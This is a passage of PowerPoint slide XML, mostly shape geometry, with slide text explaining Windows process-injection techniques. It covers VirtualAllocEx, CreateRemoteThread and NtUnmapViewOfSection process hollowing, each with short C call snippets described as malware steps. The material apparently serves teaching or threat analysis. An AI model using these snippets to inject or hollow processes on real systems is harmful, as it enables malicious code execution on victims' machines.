                  <a:pt x="359310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="377349" y="0"/>
                  <a:pt x="391973" y="14624"/>
                  <a:pt x="391973" y="32663"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="391973" y="359310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="391973" y="377349"/>
                  <a:pt x="377349" y="391973"/>
                  <a:pt x="359310" y="391973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32663" y="391973"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="391973"/>
                  <a:pt x="0" y="377349"/>
                  <a:pt x="0" y="359310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32663"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32663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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448470" y="1633222"/>
            <a:ext cx="146990" cy="195987"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="146990" h="195987">
                <a:moveTo>
                  <a:pt x="0" y="24498"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="10986"/>
                  <a:pt x="10986" y="0"/>
                  <a:pt x="24498" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="81725" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88232" y="0"/>
                  <a:pt x="94472" y="2565"/>
                  <a:pt x="99065" y="7158"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139832" y="47963"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144425" y="52557"/>
                  <a:pt x="146990" y="58796"/>
                  <a:pt x="146990" y="65303"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="146990" y="171488"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="146990" y="185001"/>
                  <a:pt x="136004" y="195987"/>
                  <a:pt x="122492" y="195987"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24498" y="195987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10986" y="195987"/>
                  <a:pt x="0" y="185001"/>
                  <a:pt x="0" y="171488"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="24498"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="79620" y="22393"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="79620" y="58184"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="79620" y="63275"/>
                  <a:pt x="83715" y="67370"/>
                  <a:pt x="88806" y="67370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124597" y="67370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79620" y="22393"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="33685" y="24498"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="28594" y="24498"/>
                  <a:pt x="24498" y="28594"/>
                  <a:pt x="24498" y="33685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24498" y="38776"/>
                  <a:pt x="28594" y="42872"/>
                  <a:pt x="33685" y="42872"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52059" y="42872"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57150" y="42872"/>
                  <a:pt x="61246" y="38776"/>
                  <a:pt x="61246" y="33685"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61246" y="28594"/>
                  <a:pt x="57150" y="24498"/>
                  <a:pt x="52059" y="24498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33685" y="24498"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="33685" y="61246"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="28594" y="61246"/>
                  <a:pt x="24498" y="65342"/>
                  <a:pt x="24498" y="70433"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24498" y="75524"/>
                  <a:pt x="28594" y="79620"/>
                  <a:pt x="33685" y="79620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52059" y="79620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57150" y="79620"/>
                  <a:pt x="61246" y="75524"/>
                  <a:pt x="61246" y="70433"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61246" y="65342"/>
                  <a:pt x="57150" y="61246"/>
                  <a:pt x="52059" y="61246"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33685" y="61246"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60595" y="122492"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="56270" y="122492"/>
                  <a:pt x="52212" y="124444"/>
                  <a:pt x="49533" y="127812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="26527" y="156560"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="23350" y="160502"/>
                  <a:pt x="24001" y="166321"/>
                  <a:pt x="27943" y="169460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31886" y="172598"/>
                  <a:pt x="37704" y="171986"/>
                  <a:pt x="40843" y="168005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58873" y="145497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64691" y="164904"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="65839" y="168809"/>
                  <a:pt x="69437" y="171450"/>
                  <a:pt x="73495" y="171450"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="113305" y="171450"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="118396" y="171450"/>
                  <a:pt x="122492" y="167354"/>
                  <a:pt x="122492" y="162263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122492" y="157172"/>
                  <a:pt x="118396" y="153076"/>
                  <a:pt x="113305" y="153076"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80347" y="153076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74184" y="132559"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72385" y="126549"/>
                  <a:pt x="66873" y="122453"/>
                  <a:pt x="60595" y="12245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Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6848609" y="1535228"/>
            <a:ext cx="4973160" cy="228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VirtualAllocEx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848609" y="1829208"/>
            <a:ext cx="4956828" cy="3919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9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Allocates executable memory within a remote process. This is typically the first step in process injection, creating a destination for malicious code.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848609" y="2319175"/>
            <a:ext cx="4891499" cy="1045262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4891499" h="1045262">
                <a:moveTo>
                  <a:pt x="32664" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4858835" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4876875" y="0"/>
                  <a:pt x="4891499" y="14624"/>
                  <a:pt x="4891499" y="32664"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4891499" y="1012597"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4891499" y="1030638"/>
                  <a:pt x="4876875" y="1045262"/>
                  <a:pt x="4858835" y="1045262"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32664" y="1045262"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="1045262"/>
                  <a:pt x="0" y="1030638"/>
                  <a:pt x="0" y="1012597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32664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Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946603" y="2417168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Remote Memory Allocation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946603" y="2613155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LPVOID lpRemoteAddress =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946603" y="2776477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VirtualAllocEx(hProcess,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946603" y="2939799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NULL, dwSize,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946603" y="3103121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MEM_COMMIT, PAGE_EXECUTE_READWRITE);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42977" y="4001393"/>
            <a:ext cx="5691778" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5691778" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5691778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5691778" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342977" y="4001393"/>
            <a:ext cx="32664" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32664" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32664" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32664" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489967" y="4132051"/>
            <a:ext cx="391973" cy="391973"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="391973" h="391973">
                <a:moveTo>
                  <a:pt x="32663" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="359310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="377349" y="0"/>
                  <a:pt x="391973" y="14624"/>
                  <a:pt x="391973" y="32663"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="391973" y="359310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="391973" y="377349"/>
                  <a:pt x="377349" y="391973"/>
                  <a:pt x="359310" y="391973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32663" y="391973"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="391973"/>
                  <a:pt x="0" y="377349"/>
                  <a:pt x="0" y="359310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32663"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32663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Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600209" y="4230044"/>
            <a:ext cx="171488" cy="195987"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="171488" h="195987">
                <a:moveTo>
                  <a:pt x="30623" y="39810"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="35693" y="39810"/>
                  <a:pt x="39810" y="35693"/>
                  <a:pt x="39810" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39810" y="25553"/>
                  <a:pt x="35693" y="21436"/>
                  <a:pt x="30623" y="21436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25553" y="21436"/>
                  <a:pt x="21436" y="25553"/>
                  <a:pt x="21436" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21436" y="35693"/>
                  <a:pt x="25553" y="39810"/>
                  <a:pt x="30623" y="39810"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="61246" y="30623"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="61246" y="43178"/>
                  <a:pt x="53705" y="53973"/>
                  <a:pt x="42872" y="58681"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42872" y="85744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110242" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="120386" y="85744"/>
                  <a:pt x="128616" y="77514"/>
                  <a:pt x="128616" y="67370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="128616" y="58681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117783" y="53973"/>
                  <a:pt x="110242" y="43178"/>
                  <a:pt x="110242" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110242" y="13704"/>
                  <a:pt x="123946" y="0"/>
                  <a:pt x="140865" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157785" y="0"/>
                  <a:pt x="171488" y="13704"/>
                  <a:pt x="171488" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171488" y="43178"/>
                  <a:pt x="163947" y="53973"/>
                  <a:pt x="153115" y="58681"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="153115" y="67370"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="153115" y="91065"/>
                  <a:pt x="133937" y="110242"/>
                  <a:pt x="110242" y="110242"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42872" y="110242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42872" y="137305"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53705" y="142014"/>
                  <a:pt x="61246" y="152808"/>
                  <a:pt x="61246" y="165364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61246" y="182283"/>
                  <a:pt x="47542" y="195987"/>
                  <a:pt x="30623" y="195987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13704" y="195987"/>
                  <a:pt x="0" y="182283"/>
                  <a:pt x="0" y="165364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="152808"/>
                  <a:pt x="7541" y="142014"/>
                  <a:pt x="18374" y="137305"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18374" y="58719"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7541" y="53973"/>
                  <a:pt x="0" y="43178"/>
                  <a:pt x="0" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="13704"/>
                  <a:pt x="13704" y="0"/>
                  <a:pt x="30623" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47542" y="0"/>
                  <a:pt x="61246" y="13704"/>
                  <a:pt x="61246" y="30623"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="150052" y="30623"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="150052" y="25553"/>
                  <a:pt x="145936" y="21436"/>
                  <a:pt x="140865" y="21436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135795" y="21436"/>
                  <a:pt x="131678" y="25553"/>
                  <a:pt x="131678" y="30623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="131678" y="35693"/>
                  <a:pt x="135795" y="39810"/>
                  <a:pt x="140865" y="39810"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145936" y="39810"/>
                  <a:pt x="150052" y="35693"/>
                  <a:pt x="150052" y="30623"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="30623" y="174551"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="35693" y="174551"/>
                  <a:pt x="39810" y="170434"/>
                  <a:pt x="39810" y="165364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39810" y="160293"/>
                  <a:pt x="35693" y="156177"/>
                  <a:pt x="30623" y="156177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25553" y="156177"/>
                  <a:pt x="21436" y="160293"/>
                  <a:pt x="21436" y="165364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21436" y="170434"/>
                  <a:pt x="25553" y="174551"/>
                  <a:pt x="30623" y="174551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4" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012597" y="4132051"/>
            <a:ext cx="4973160" cy="228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CreateRemoteThread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12597" y="4426031"/>
            <a:ext cx="4956828" cy="3919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9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Creates a new thread within the target process to execute injected malicious code. This provides the execution trigger for the payload.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012597" y="4915997"/>
            <a:ext cx="4891499" cy="1045262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4891499" h="1045262">
                <a:moveTo>
                  <a:pt x="32664" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4858835" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4876875" y="0"/>
                  <a:pt x="4891499" y="14624"/>
                  <a:pt x="4891499" y="32664"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4891499" y="1012597"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4891499" y="1030638"/>
                  <a:pt x="4876875" y="1045262"/>
                  <a:pt x="4858835" y="1045262"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32664" y="1045262"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="1045262"/>
                  <a:pt x="0" y="1030638"/>
                  <a:pt x="0" y="1012597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32664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7" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110591" y="5013991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Thread Execution Trigger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110591" y="5209977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HANDLE hThread = CreateRemoteThread(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10591" y="5373299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hProcess, NULL, 0,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10591" y="5536622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(LPTHREAD_START_ROUTINE)lpStartAddress,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110591" y="5699944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lpParameter, 0, NULL);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78988" y="4001393"/>
            <a:ext cx="5691778" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5691778" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5691778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5691778" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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3" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178988" y="4001393"/>
            <a:ext cx="32664" cy="2466165"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32664" h="2466165">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32664" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32664" y="2466165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2466165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4" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325978" y="4132051"/>
            <a:ext cx="391973" cy="391973"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="391973" h="391973">
                <a:moveTo>
                  <a:pt x="32663" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="359310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="377349" y="0"/>
                  <a:pt x="391973" y="14624"/>
                  <a:pt x="391973" y="32663"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="391973" y="359310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="391973" y="377349"/>
                  <a:pt x="377349" y="391973"/>
                  <a:pt x="359310" y="391973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32663" y="391973"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14624" y="391973"/>
                  <a:pt x="0" y="377349"/>
                  <a:pt x="0" y="359310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32663"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14636"/>
                  <a:pt x="14636" y="0"/>
                  <a:pt x="32663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5" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6423972" y="4230044"/>
            <a:ext cx="195987" cy="195987"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="195987" h="195987">
                <a:moveTo>
                  <a:pt x="0" y="30623"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20479"/>
                  <a:pt x="8230" y="12249"/>
                  <a:pt x="18374" y="12249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="55121" y="12249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="65265" y="12249"/>
                  <a:pt x="73495" y="20479"/>
                  <a:pt x="73495" y="30623"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="73495" y="36747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122492" y="36747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122492" y="30623"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="122492" y="20479"/>
                  <a:pt x="130722" y="12249"/>
                  <a:pt x="140865" y="12249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="177613" y="12249"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="187757" y="12249"/>
                  <a:pt x="195987" y="20479"/>
                  <a:pt x="195987" y="30623"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="195987" y="67370"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="195987" y="77514"/>
                  <a:pt x="187757" y="85744"/>
                  <a:pt x="177613" y="85744"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="140865" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="130722" y="85744"/>
                  <a:pt x="122492" y="77514"/>
                  <a:pt x="122492" y="67370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="122492" y="61246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73495" y="61246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73495" y="67370"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="73495" y="70165"/>
                  <a:pt x="72844" y="72844"/>
                  <a:pt x="71734" y="75218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="97993" y="110242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128616" y="110242"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="138760" y="110242"/>
                  <a:pt x="146990" y="118472"/>
                  <a:pt x="146990" y="128616"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="146990" y="165364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="146990" y="175508"/>
                  <a:pt x="138760" y="183737"/>
                  <a:pt x="128616" y="183737"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91869" y="183737"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="81725" y="183737"/>
                  <a:pt x="73495" y="175508"/>
                  <a:pt x="73495" y="165364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="73495" y="128616"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="73495" y="125822"/>
                  <a:pt x="74146" y="123142"/>
                  <a:pt x="75256" y="120769"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48997" y="85744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18374" y="85744"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8230" y="85744"/>
                  <a:pt x="0" y="77514"/>
                  <a:pt x="0" y="67370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="30623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6" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6848609" y="4132051"/>
            <a:ext cx="4973160" cy="228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NtUnmapViewOfSection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848609" y="4426031"/>
            <a:ext cx="4956828" cy="3919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9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technique that unmaps legitimate code sections before replacing them with malicious payloads, enabling process hollowing.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848609" y="4915997"/>
            <a:ext cx="4891499" cy="881940"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4891499" h="881940">
                <a:moveTo>
                  <a:pt x="32667" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4858832" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4876873" y="0"/>
                  <a:pt x="4891499" y="14626"/>
                  <a:pt x="4891499" y="32667"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4891499" y="849273"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4891499" y="867314"/>
                  <a:pt x="4876873" y="881940"/>
                  <a:pt x="4858832" y="881940"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32667" y="881940"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14626" y="881940"/>
                  <a:pt x="0" y="867314"/>
                  <a:pt x="0" y="849273"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32667"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14626"/>
                  <a:pt x="14626" y="0"/>
                  <a:pt x="32667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9" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6946603" y="5013991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Process Hollowing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946603" y="5209977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NtUnmapViewOfSection(hProcess,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946603" y="5373299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(PVOID)dwBaseAddress);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946603" y="5536622"/>
            <a:ext cx="4752675" cy="1633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0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Replace with malicious code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342977" y="6565551"/>
            <a:ext cx="11522379" cy="653289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11522379" h="653289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11522379" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11522379" y="653289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="653289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4" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342977" y="6565551"/>
            <a:ext cx="32664" cy="653289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32664" h="653289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32664" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32664" y="653289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="653289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5" name="Shape 53"/>
